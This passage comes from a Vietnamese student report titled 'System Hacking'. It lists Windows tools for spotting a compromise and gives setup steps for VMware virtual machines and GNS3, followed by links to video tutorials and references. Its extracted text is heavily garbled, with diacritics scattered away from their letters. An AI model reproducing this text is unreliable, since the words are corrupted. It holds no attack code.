Microsoft đã xây d ng m t lo t các công c trong Windows đ các nhàự ộ ạ ụ ể

qu n tr cũng nh ng i dùng có kinh nghi m có th phân tích chi c máy tínhả ị ư ườ ệ ể ế

Huỳnh Minh Trí Page 39

Page 41: System Hacking

System Hacking

c a mình xem li u nó có đang b xâm ph m hay không. M t khi nghi ng máyủ ệ ị ạ ộ ờ

tính c a mình b xâm nh p, ng i dùng có th s d ng các công c này đ tủ ị ậ ườ ể ử ụ ụ ể ự

ki m tra máy tính c a mình khi có nh ng bi u hi n đáng ng : WMIC, L nh net,ể ủ ữ ể ệ ờ ệ

Openfiles, Netstat, Find.

PH L C: H NG D N CÀI Đ T M T S PH NỤ Ụ ƯỚ Ẫ Ặ Ộ Ố Ầ

M MỀ

1. Cài đ t VMwareặ

Đ u tiên các b n vào đ a ch ầ ạ ị ỉ http://www.vmware.com đ t i Vmwareể ả

phiên b n m i nh t v cũng nh là đăng ký b n quy n cho Vmware.ả ớ ấ ề ư ả ề

Ti p đó các b n m file cài đ t Vmware đã đ c t i v .ế ạ ở ặ ượ ả ề

Ch ng trình cài đ t sẽ b t đ u sau khi load xong m t s file quan tr ngươ ặ ắ ầ ộ ố ọ

Huỳnh Minh Trí Page 40

Page 42: System Hacking

System Hacking

Ch n ọ Next

Có 2 l a ch n cho quá trình cài đ t: ự ọ ặ Typical ho c ặ CustomHuỳnh Minh Trí Page 41

Page 43: System Hacking

System Hacking

– Typical: ch n n i sẽ cài đ t và ch n ọ ơ ặ ọ Next đ ti p t cể ế ụ

Huỳnh Minh Trí Page 42

Page 44: System Hacking

System Hacking

– Custom: ch n các gói cài đ t thêm; n u ch n gói debug Eclipse thì ph iọ ặ ế ọ ả

ch n c 2 gói Java và C n u không ch ng trình sẽ báo l i -> Ch n ọ ả ế ươ ỗ ọ Next đ ti pể ế

t cụ

Huỳnh Minh Trí Page 43

Page 45: System Hacking

System Hacking

L a ch n n i ch ng trình sẽ t o shortcut -> Ch n ự ọ ơ ươ ạ ọ Next

Ch n ọ Continue đ b t đ u cài đ tể ắ ầ ặ

Huỳnh Minh Trí Page 44

Page 46: System Hacking

System Hacking

Quá trình cài đ t b t đ u … quá trình này có th kéo dài t 5′~10′ặ ắ ầ ể ừ

Huỳnh Minh Trí Page 45

Page 47: System Hacking

System Hacking

Cài đ t hoàn t t ch ng trình sẽ yêu c u đăng ký b n quy n, Ch n ặ ấ ươ ầ ả ề ọ Next

ho c các b n có th b qua b c này b ng cách Ch n ặ ạ ể ỏ ướ ằ ọ Skip

K t thúc quá trình VMW7 sẽ yêu c u kh i đ ng l i máy tính. Có th kô c nế ầ ở ộ ạ ể ầ

kh i đ ng l i mà v n có th kh i đ ng đ c ch ng trìnhở ộ ạ ẫ ể ở ộ ượ ươ

Huỳnh Minh Trí Page 46

Page 48: System Hacking

System Hacking

Trong l n kh i đ ng đ u tiên VMW sẽ mu n b n xác nh n l i là có mu n ầ ở ộ ầ ố ạ ậ ạ ố

s d ng ch ng trình hay kô! N u có ch n ử ụ ươ ế ọ Yes -> Ch n ọ OK đ xác nh nể ậ

Đây là giao di n làm vi c chính c a ch ng trìnhệ ệ ủ ươ

Huỳnh Minh Trí Page 47

Page 49: System Hacking

System Hacking

2. Cài đ t máy o b ng VMware:ặ ả ằ

Sau khi t i v và cài đ t trên máy tính b n kh i đ ng ch ng trìnhả ề ặ ạ ở ộ ươ

VMware b ng cách ch n đúp vào bi u t ng ngoài màn hình Desktop, và làmằ ọ ể ượ

theo các b c sau:ướ

T màn hình chính b n ch n ừ ạ ọ Menu File > New > Virtual Machine… ho cặ

Ctrl+ N

Huỳnh Minh Trí Page 48

Page 50: System Hacking

System Hacking

Ch n ọ Next

B n ch n ạ ọ Typical đ cài m c đ nh sau đó Ch n ể ặ ị ọ Next

Huỳnh Minh Trí Page 49

Page 51: System Hacking

System Hacking

Ph n m m h tr cho b n r t nhi u h đi u hành t Windows đ n Linuxầ ề ỗ ợ ạ ấ ề ệ ề ừ ế

ho c Sun Solaris... B n ch n h đi u hành và phiên b n r i Ch n ặ ạ ọ ệ ề ả ồ ọ Next để

ti p t cế ụ

đây tôi ch n cài h đi u hành Windows XP 64 bít, b n cũng có th thay Ở ọ ệ ề ạ ể

đ i th m c l u tr t i ổ ư ụ ư ữ ạ Location, r i Ch n ồ ọ Next đ ti p t cể ế ụ

Huỳnh Minh Trí Page 50

Page 52: System Hacking

System Hacking

T i đây b n nên ch n ạ ạ ọ Use Brided Networking đ c i đ t cho Card m ngể ả ặ ạ

c a mình và Ch n ủ ọ Next đ ti p t cể ế ụ

T i đây b n có th thay đ i giá tr c a c ng trên máy o (M c đ nh là 8Gb) vàạ ạ ể ổ ị ủ ổ ứ ả ặ ị

Huỳnh Minh Trí Page 51

Page 53: System Hacking

System Hacking

Ch n ọ Finish đ k t thúc quá trình l a ch n c u hình máy o.ể ế ự ọ ấ ả

Nh v y là quá trình l a ch n c u hình máy o k t thúcư ậ ự ọ ấ ả ế

Huỳnh Minh Trí Page 52

Page 54: System Hacking

System Hacking

B n cũng có th thay đ i các thông s nh dung l ng RAM, d ng l ngạ ể ổ ố ư ượ ươ ượ

c ng ngay t i đây.ổ ứ ạ

Đ thi t l p CD-ROM cho máy o ph c v cho cài đ t h đi u hành b nể ế ậ ổ ả ụ ụ ặ ệ ề ạ

Ch n đúp vào ọ ổ CD-ROM.

– N u b n mu n cài t đĩa CD/DVD thì b n tích ch n ế ạ ố ừ ạ ọ User phisical

Driver và ch nọ Auto Detect

– N u mu n cài t file ISO có trong máy b n tích ch n ế ố ừ ạ ọ Use ISO image và

tìm đ n file ISO trên máy c a b nế ủ ạ

Huỳnh Minh Trí Page 53

Page 55: System Hacking

System Hacking

Sau khi hoàn t t, đ cài máy o b n Ch n ấ ể ả ạ ọ "Start this Vitual Machine"

Và b n th c hi n cài bình th ng nh cài cho máy th t.ạ ự ệ ườ ư ậ

3. Cài đ t GNS3:ặ

GNS3 có th ch y trên Windows,Linux và Mac OSX.Đ cài đ t ph n m mể ạ ể ặ ầ ề

trên Window d dàng chúng ta có th s d ng b cài đ t all-in-one cung c pễ ể ử ụ ộ ặ ấ

m i th b n c n đ ch y đ c GNS3.ọ ứ ạ ầ ể ạ ượ

Các b n ch n file GNS3.exe trong ph n th y giáo g i.ạ ọ ầ ầ ử

Ti n hành cài đ tế ặ

Huỳnh Minh Trí Page 54

Page 56: System Hacking

System Hacking

Huỳnh Minh Trí Page 55

Page 57: System Hacking

System Hacking

Huỳnh Minh Trí Page 56

Page 58: System Hacking

System Hacking

Huỳnh Minh Trí Page 57

Page 59: System Hacking

System Hacking

Giao di n GNS3 sau khi cài đ t xongệ ặ  

3. C u hình cho GNS3:ấ

Vào Edit > Add IOS images and hypervisors ch đ ng d n đ n các file IOSỉ ườ ẫ ế

trong m c Settingụ

Huỳnh Minh Trí Page 58

Page 60: System Hacking

System Hacking

Các b n vào ph n Image file: vào ch n đ ng d n t i ph n tài li u c aạ ầ ọ ườ ẫ ớ ầ ệ ủ

th y giáo g i có đính kèm file :c2691-adventerprisek9-mz.124-25c.binầ ử

Huỳnh Minh Trí Page 59

Page 61: System Hacking

System Hacking

Sau khi ch n đ ng d n xong các b n nh n Save.ọ ườ ẫ ạ ấ

Vào Edit > Preferences > Dynamips > Trong m c Excutable Path ch nụ ọ

đ ng d n đ n t p tin dynamip-wxp.exe trong th m c cài đ t GNS3 , sau đóườ ẫ ế ậ ư ụ ặ

b m vào nút Test đ ki m tra l i ho t đ ng c a Dynamip.ấ ể ể ạ ạ ộ ủ

Huỳnh Minh Trí Page 60

Page 62: System Hacking

System Hacking

Huỳnh Minh Trí Page 61

Page 63: System Hacking

System Hacking

Nh n ok.ấ

Kéo th các router đã có IOS vào đ tri n khai 1 mô hình đ n gi n.ả ể ể ơ ả

Huỳnh Minh Trí Page 62

Page 64: System Hacking

System Hacking

CÁC CLIP H NG D NƯỚ Ẫ

https://www.youtube.com/watch?v=V_l_JNnH2GU&list=UUc8-uuS3IRvbEk1EOjrVYEQ

https://www.youtube.com/watch?v=wU-l1dO5ZqE&index=2&list=UUc8-uuS3IRvbEk1EOjrVYEQ

https://www.youtube.com/watch?v=fasOuWKRnx0&list=UUc8-uuS3IRvbEk1EOjrVYEQ&index=9

https://www.youtube.com/watch?v=fQ5qC4E11Do&list=UUc8-uuS3IRvbEk1EOjrVYEQ

https://www.youtube.com/watch?v=5liS6E1ge90&list=UUc8-uuS3IRvbEk1EOjrVYEQ&index=2

https://www.youtube.com/watch?v=INkaadmMras&list=UUc8-uuS3IRvbEk1EOjrVYEQ&index=3

https://www.youtube.com/watch?v=6ADhFh7f0h8&index=4&list=UUc8-uuS3IRvbEk1EOjrVYEQ

Huỳnh Minh Trí Page 63

Page 65: System Hacking

System Hacking

DANH M C TÀI LI U THAM KH OỤ Ệ Ả

http://suamaytinhtainha.info/thu-thuat-may-tinh/cach-hack-may-tinh-trong-mang-lan-bang-backtrack-5.html

https://www.mediafire.com/folder/laq7hirml1w5g/Athena-TaiLieu

http://athena.edu.vn/video/an-ninh-mang

Huỳnh Minh Trí Page 64